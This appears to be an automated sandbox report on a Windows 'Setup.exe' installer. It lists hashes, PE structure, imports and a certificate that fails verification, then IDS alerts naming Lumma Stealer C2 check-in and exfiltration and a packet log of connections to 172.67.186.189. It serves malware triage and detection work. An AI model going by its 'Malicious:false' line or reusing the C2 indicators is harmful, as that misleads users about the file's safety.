SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):4.241175063629575
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Setup.exe
File size:73'409'776 bytes
MD5:7a2ed58357c7dc7a63754e88af43a860
SHA1:632930cbe696ee75e3445835258c77e8d27ab426
SHA256:984d3e2de76f512c364247b280180d5bd7ed45b4d0c483e10a041943e08730d4
SHA512:45fdf09bb9a9f6de000942cb09c1a62f3d1ddff694ededb9c75f604cdd47cd86f4aef4cfbf8f2976f3020900200f282696c916c6f2fabf5efdd5c842491be935
SSDEEP:24576:jh04AuiujHsXJpAJ7PaZDIdq/TMMqfiSq8ll6yT7O3H/o7xn+6cUsMnE2:C4AJWJ7aZxF1Sq8llXT7O3Hg7xxsGH
TLSH:F1F723AF430CB0BA5EF27C5B2172B59A1222768131F14E0EC5D4DD299BA7960D3363F9
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
Icon Hash:ae9ae8e4ecfaaeba
Entrypoint:0x4038af
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:be41bf7b8cc010b614bd36bbca606973
Signature Valid:false
Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before, Not After
• 24/06/2022 09:22:08 14/04/2025 16:06:58
Subject Chain
• OID.1.3.6.1.4.1.311.60.2.1.3=US, OID.1.3.6.1.4.1.311.60.2.1.2=Washington, OID.2.5.4.15=Private Organization, CN=TechPowerUp LLC, SERIALNUMBER=604 057 982, O=TechPowerUp LLC, L=Spokane, S=Washington, C=US
Version:3
Thumbprint MD5:648FDCF28A095B6DA4C31C9D5CD35A64
Thumbprint SHA-1:8DAAE716F69B30A0DDC8C8A3F8EAC6C5B328CFD2
Thumbprint SHA-256:20740B0C498F45830DD1D84EC746DEA5E43C2B0D32C603F2C2403A333CE9E8E7
Serial:115BBE9E1C286827AF66E7A01390C206
Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007F9A9D5149FBh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007F9A9D5146DDh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007F9A9D5146CBh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007F9A9D511FCAh
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007F9A9D5143A1h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007F9A9D512053h
push 00000020h
pop ebx
cmp ax, bx
jne 00007F9A9D511FCAh
add esi, 02h
cmp word ptr [esi], bx
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ C ] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x3210e | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x4600020 | 0x24d0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x100000 | 0x3210e | 0x32200 | 0f21167f0af9bac84fe5f2fc0f537099 | False | 0.949608400872818 | data | 7.842128001448306 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x133000 | 0xfd6 | 0x1000 | 02f92148b093633a3107bbd435f8faff | False | 0.568603515625 | data | 5.326683697973451 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1002c8 | 0x222b0 | PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced | English | United States | 0.9765705384703327
RT_ICON | 0x122578 | 0x8edc | PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced | English | United States | 0.9978125341791535
RT_ICON | 0x12b454 | 0x289f | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0010577940186556
RT_ICON | 0x12dcf4 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 9792 | English | United States | 0.6275427176566314
RT_ICON | 0x13035c | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.686247723132969
RT_ICON | 0x131484 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.8812056737588653
RT_DIALOG | 0x1318ec | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x1319ec | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x131b08 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x131b68 | 0x5a | data | English | United States | 0.7888888888888889
RT_VERSION | 0x131bc4 | 0x274 | data | English | United States | 0.5079617834394905
RT_MANIFEST | 0x131e38 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-22T23:28:44.992703+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49760 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:45.767273+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49760 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:45.767273+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49760 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:46.999528+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49766 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:47.780519+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49766 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:47.780519+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49766 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:49.412750+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49775 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:50.654793+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49775 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:51.931764+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49782 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:54.195683+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49788 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:56.669995+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49794 | 172.67.186.189 | 443 | TCP
2024-12-22T23:28:58.952601+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49799 | 172.67.186.189 | 443 | TCP
2024-12-22T23:29:01.468180+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49805 | 172.67.186.189 | 443 | TCP
2024-12-22T23:29:01.474167+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.5 | 49805 | 172.67.186.189 | 443 | TCP
2024-12-22T23:29:05.112090+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49816 | 172.67.186.189 | 443 | TCP
2024-12-22T23:29:05.877554+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49816 | 172.67.186.189 | 443 | TCP
2024-12-22T23:29:11.147526+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49823 | 194.58.112.174 | 443 | TCP
2024-12-22T23:29:17.590806+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49846 | 172.67.191.144 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 22, 2024 23:28:43.776015043 CET | 49760 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:43.776078939 CET | 443 | 49760 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:43.776202917 CET | 49760 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:43.777878046 CET | 49760 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:43.777904987 CET | 443 | 49760 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:44.992486000 CET | 443 | 49760 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:44.992702961 CET | 49760 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:44.994105101 CET | 49760 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:44.994126081 CET | 443 | 49760 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:44.994343042 CET | 443 | 49760 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:45.040833950 CET | 49760 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:45.047408104 CET | 49760 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:45.047445059 CET | 49760 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:45.047487020 CET | 443 | 49760 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:45.767292976 CET | 443 | 49760 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:45.767427921 CET | 443 | 49760 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:45.767501116 CET | 49760 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:45.776856899 CET | 49760 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:45.776886940 CET | 443 | 49760 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:45.776917934 CET | 49760 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:45.776935101 CET | 443 | 49760 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:45.785418034 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:45.785470963 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:45.785568953 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:45.785837889 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:45.785851002 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:46.999456882 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:46.999527931 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.001204967 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.001214981 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.001518011 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.002854109 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.002880096 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.002919912 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.780529976 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.780577898 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.780606985 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.780625105 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.780632019 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.780653000 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.780678988 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.785437107 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.785480976 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.785495043 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.793920040 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.793963909 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.793983936 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.837580919 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.837599039 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.884453058 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.900332928 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.904203892 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.904261112 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.904273987 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.946950912 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.972482920 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.976284981 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.976339102 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.976350069 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.983838081 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.983894110 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.983901024 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.983915091 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.983983994 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.984169006 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.984186888 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:47.984199047 CET | 49766 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:47.984205961 CET | 443 | 49766 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:48.191580057 CET | 49775 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:48.191689968 CET | 443 | 49775 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:48.191778898 CET | 49775 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:48.192140102 CET | 49775 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:48.192193985 CET | 443 | 49775 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:49.412653923 CET | 443 | 49775 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:49.412750006 CET | 49775 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:49.413898945 CET | 49775 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:49.413913965 CET | 443 | 49775 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:49.414252043 CET | 443 | 49775 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:49.415509939 CET | 49775 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:49.415647984 CET | 49775 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:49.415684938 CET | 443 | 49775 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:50.654822111 CET | 443 | 49775 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:50.655113935 CET | 443 | 49775 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:50.655189991 CET | 49775 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:50.655304909 CET | 49775 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:50.655361891 CET | 443 | 49775 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:50.710551023 CET | 49782 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:50.710606098 CET | 443 | 49782 | 172.67.186.189 | 192.168.2.5
Dec 22, 2024 23:28:50.710686922 CET | 49782 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:50.710942984 CET | 49782 | 443 | 192.168.2.5 | 172.67.186.189
Dec 22, 2024 23:28:50.710975885 CET | 443 | 49782 | 172.67.186.189 | 192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:51.931597948 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:51.931763887 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:51.933150053 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:51.933177948 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:51.933823109 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:51.934995890 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:51.935137033 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:51.935187101 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:51.935260057 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:51.979324102 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:52.795180082 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:52.795489073 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:52.795593977 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:52.795743942 CET49782443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:52.795773983 CET44349782172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:52.971522093 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:52.971621037 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:52.971756935 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:52.972067118 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:52.972100973 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:54.195590973 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:54.195683002 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:54.197326899 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:54.197345018 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:54.197841883 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:54.199209929 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:54.199373007 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:54.199435949 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:54.199522018 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:54.199537039 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:55.131206036 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:55.131485939 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:55.131565094 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:55.131644964 CET49788443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:55.131668091 CET44349788172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:55.446520090 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:55.446607113 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:55.446702003 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:55.447058916 CET49794443192.168.2.5172.67.186.189
                                                                                                                                                                            Dec 22, 2024 23:28:55.447089911 CET44349794172.67.186.189192.168.2.5
                                                                                                                                                                            Dec 22, 2024 23:28:56.669915915 CET44349794172.67.186.189192.168.2.5
